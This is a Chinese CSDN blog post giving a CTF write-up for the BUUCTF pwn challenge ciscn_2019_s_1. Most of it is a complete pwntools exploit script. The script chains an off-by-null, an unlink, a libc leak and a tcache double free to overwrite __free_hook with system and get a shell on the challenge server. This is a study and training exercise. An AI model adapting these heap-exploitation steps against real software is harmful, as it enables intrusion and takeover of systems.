ciscn_2019_s_1

最新推荐文章于 2024-04-12 05:29:08 发布
最新推荐文章于 2024-04-12 05:29:08 发布
阅读量724 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/107026628
版权

思路

通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell
exp:

from pwn import *
#p=process('./ciscn_s_1')
p=remote('node3.buuoj.cn',26429)
elf=ELF('./ciscn_s_1')
libc=elf.libc


def add(idx,size,data):
	p.sendlineafter('show','1')
	p.sendlineafter(':',str(idx))
	p.sendlineafter(':',str(size))
	p.recvuntil(': ')
	address=int('0x'+p.recv(7),16)
	p.sendafter(':',data)
	return address

def delete(idx):
	p.sendlineafter('show','2')
	p.sendlineafter(':',str(idx))

def edit(idx,data):
	p.sendlineafter('show','3')
	p.sendlineafter(':',str(idx))
	p.sendafter(':',data)

def show(idx):
	p.sendlineafter('show','4')
	p.sendlineafter(':',str(idx))


###########off by null##############
for i in range(7):
	add(i,0x90,'\x01'*0x10)
for i in range(8,14):
	add(i,0xf0,'\x02'*0x20)
add(18,0xf8,'ddd')
add(15,0x98,'aaa')
add(19,0xb8,'fff')
add(16,0xf8,'bbb')
add(23,0x98,'eee')
add(24,0xf8,'ggg')
add(17,0xa0,'/bin/sh\x00')
for i in range(7):
	delete(i)
for i in range(8,14):
	delete(i)
delete(15)
delete(18)
payload='\x00'*0xb0+p64(0x160)
edit(19,payload)
delete(16)
for i in range(8):
	add(i,0x90,'\x01'*0x10)
address=add(18,0xb8,'aaa')
delete(19)
edit(18,p64(0x6022B8))
add(19,0xb0,'a')
add(30,0xb8,'\xff'*4+'\x00'*4)
###############################################################


############################unlink#######################
for i in range(7):
	delete(i)
for i in range(8,14):
	add(i,0xf8,'aaa')
add(15,0xf0,'aaa')
add(21,0xf8,'bb')
address=add(27,0xd0,'ccc')
delete(19)
show(18)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-96-0x10
log.success('libcbase: '+hex(libcbase))
log.success('address: '+hex(address))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']

for i in range(8,14):
	delete(i)
delete(15)
payload=p64(0)+p64(0x91)+p64(0x602198-0x18)+p64(0x602198-0x10)+'\x00'*0x70+p64(0x90)
edit(23,payload)
delete(24)
edit(23,p64(address)*2)
#############################################################################

###########double free####################
delete(20)
delete(21)
add(20,0xd0,p64(free_hook))
add(21,0xd0,'/bin/sh\x00')
add(22,0xd0,p64(system))
delete(21)
#########################################

p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
最新发布
weixin_62467741的博客
05-22 885
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2314
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
ciscn_2019_s_9
z1r0的博客
12-28 1114
ciscn_2019_s_9 查看保护 妥妥的shellcode题目 溢出,返回到s地址处的shellcode。给了一个hint,借助jmp esp这个跳板让eip成功执行到shellcode。 shellcode大小要小于0x20即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('nod
ciscn的简介
weixin_33840661的博客
03-31 1227
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 236
ciscn_2019_s_9
全国大学生信息安全竞赛(CISCN)-reverse-复现(部分)
ookami6497的博客
06-06 1003
CISCN
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
m0_74918915的博客
04-12 1607
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法。
ciscn 2018 部分writeup
StriveBen的博客
05-07 3907
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
ciscn_2019_sw_1
doudoudedi
04-16 580
思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp: from pwn import * #p=proce...
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN
Welcome To Myon'Blog !
05-27 1827
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
CISCN(Web Ezpentest)GC、序列化、case when
qq_62046696的博客
02-17 655
最近又学到了一道新知识,case when的错误注入,也是盲注的一种。结果返回 NULL解释一下这个就可以理解,也就是首先二进制(B),然后when后面其实就是判断,如果判断成功执行 then都没有则会返回NULL单纯看的话,这段代码基本就是sql注入的后端,id后面的东西是需要我们注入的,REGEXP后面是是否以f开头,重点是这里如果不成立则会 1+~0(这里为取反操作符,0 取反即为最大值,再加 1 溢出报错)
ciscn_2019_s_4
z1r0的博客
12-21 284
ciscn_2019_s_4 查看保护 有栈溢出啊,但是空间太小了,所以需要栈迁移一下。 栈迁移用leave ret这个gadget来让ebp, esp放到我们需要的地方 这里把栈迁移到s这里。所以得知道s的地址。这个时候需要借助printf打印来打印出地址。 有了ebp,s就-0x38。有system没有/bin/sh,所以将/bin/sh写进s里然后借助leave ret这个gadget让程序执行system(’/bin/sh’)即可。 from pwn import * context(ar
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码分析,题目的主函数是"main"函数。它首先打印了一些欢迎信息,在一个无限循环中等待用户输入指令。根据用户输入的指令来执行相应的功能。当用户输入为1时,调用"encrypt"函数进行加密操作。当用户输入为2时,提示用户自己进行操作。当用户输入为3时,退出程序。其他输入会提示输入错误。 根据的代码分析,"encrypt"函数用于对用户输入的明文进行加密操作。在函数内部,首先定义了一个字符数组"s"用于存储用户输入的明文。然后使用gets函数获取用户输入,存在栈溢出的漏洞。接下来,对用户输入的明文进行加密操作。根据输入的字符的ASCII值的范围,使用不同的异或值进行加密。最后将加密后的密文打印出来。 综上所述,题目"ciscn_2019_c_1"是一个涉及fastbin堆漏洞利用的题目。在主函数中,根据用户输入的指令来执行相应的功能,包括调用"encrypt"函数进行加密操作。"encrypt"函数中存在栈溢出漏洞,并对用户输入的明文进行加密操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值